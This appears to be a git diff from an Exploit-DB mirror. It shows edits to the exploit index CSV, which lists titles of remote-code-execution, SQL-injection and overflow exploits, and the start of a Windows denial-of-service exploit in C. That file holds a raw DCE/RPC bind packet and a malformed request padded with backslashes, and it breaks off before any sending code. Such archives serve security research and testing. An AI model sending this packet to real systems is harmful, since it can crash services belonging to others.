16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 Format String",2010-06-22,metasploit,windows,remote,21
16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g MKD Command Buffer Overflow",2011-02-23,metasploit,windows,remote,0
16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,metasploit,windows,remote,0
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,metasploit,windows,remote,2100
16715,platforms/windows/remote/16715.rb,"Serv-U FTPD MDTM Overflow",2010-09-20,metasploit,windows,remote,21
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0
@ -14720,7 +14720,7 @@ id,file,description,date,author,platform,type,port
16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0
16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0
16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0
16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0
16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0
16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,metasploit,linux,remote,0
@ -14925,7 +14925,7 @@ id,file,description,date,author,platform,type,port
17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0
17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip File) Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0
17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection Vulnerability",2011-04-11,R3d-D3V!L,php,webapps,0
17147,platforms/linux/local/17147.txt,"tmux - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0
17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0
17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001
17149,platforms/windows/remote/17149.rb,"Real Networks Arcade Games - StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution",2011-04-09,metasploit,windows,remote,0
17150,platforms/windows/local/17150.rb,"AOL Desktop 9.6 RTX Buffer Overflow",2011-04-08,metasploit,windows,local,0
@ -14976,7 +14976,7 @@ id,file,description,date,author,platform,type,port
17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0
17207,platforms/php/webapps/17207.txt,"ajax category dropdown wordpress plugin 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0
17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 - (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0
17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0
17214,platforms/php/webapps/17214.php,"WordPress SermonBrowser Plugin 0.43 - SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0
17215,platforms/hardware/webapps/17215.txt,"Snom IP Phone Web Interface < 8 - Multiple Vulnerabilities",2011-04-26,"Yakir Wizman",hardware,webapps,0
@ -15759,7 +15759,7 @@ id,file,description,date,author,platform,type,port
18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0
18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0
18149,platforms/php/webapps/18149.php,"PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit",2011-11-23,EgiX,php,webapps,0
18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0
18151,platforms/php/webapps/18151.php,"Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-24,"Adel SBM",php,webapps,0
18153,platforms/cgi/webapps/18153.txt,"LibLime Koha <= 4.2 - Local File Inclusion Vulnerability",2011-11-24,"Akin Tosunlar",cgi,webapps,0
18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH - sh4 - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
18155,platforms/php/webapps/18155.txt,"Zabbix <= 1.8.4 (popup.php) SQL Injection",2011-11-24,"Marcio Almeida",php,webapps,0
@ -15852,7 +15852,7 @@ id,file,description,date,author,platform,type,port
18276,platforms/php/webapps/18276.txt,"Wordpress Mailing List Plugin - Arbitrary File Download",2011-12-26,6Scan,php,webapps,0
18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script Arbitrary File Upload Vulnerability",2011-12-26,ySecurity,php,webapps,0
18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0
18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid: Remote Root function pointer overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit metasploit",2011-12-27,"Fady Mohammed Osman",windows,remote,0
18412,platforms/php/webapps/18412.php,"Wordpress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0
18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0
@ -16415,11 +16415,11 @@ id,file,description,date,author,platform,type,port
19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,metasploit,windows,remote,0
18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0
18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0
18999,platforms/php/webapps/18999.php,"SN News (visualiza.php) <= 1.2 - SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0
18999,platforms/php/webapps/18999.php,"SN News <= 1.2 - (visualiza.php) SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0
19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0
19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0
19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 - Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0
19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0
19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 - (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0
19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0
19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0
19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0
@ -16882,7 +16882,7 @@ id,file,description,date,author,platform,type,port
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
19519,platforms/windows/local/19519.rb,"Irfanview JPEG2000 <= 4.3.2.0 - jp2 - Stack Buffer Overflow",2012-07-01,metasploit,windows,local,0
19520,platforms/bsd/remote/19520.txt,"BSD telnetd Remote Root Exploit",2012-07-01,kingcope,bsd,remote,0
@ -25617,7 +25617,7 @@ id,file,description,date,author,platform,type,port
28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0
28561,platforms/multiple/dos/28561.pl,"Blast XPlayer Local Buffer Overflow PoC",2013-09-26,flux77,multiple,dos,0
28562,platforms/hardware/webapps/28562.txt,"Hewlett-Packard 2620 Switch Series. Edit Admin Account - CSRF Vulnerability",2013-09-26,"Hubert Gradek",hardware,webapps,0
28563,platforms/multiple/webapps/28563.txt,"posnic stock management system 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0
28563,platforms/multiple/webapps/28563.txt,"Posnic Stock Management System 1.02 - Multiple Vulnerabilities",2013-09-26,"Sarahma Security",multiple,webapps,0
28564,platforms/php/webapps/28564.txt,"ArticleSetup Multiple Vulnerabilities",2013-09-26,DevilScreaM,php,webapps,0
28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0
28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0

Can't render this file because it is too large.

432
platforms/windows/dos/1269.c
View file

@ -1,216 +1,216 @@
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
unsigned char szBindString[] =
{
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
};
unsigned char szRequestString[] =
{
0x05,0x00,
0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00,
0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
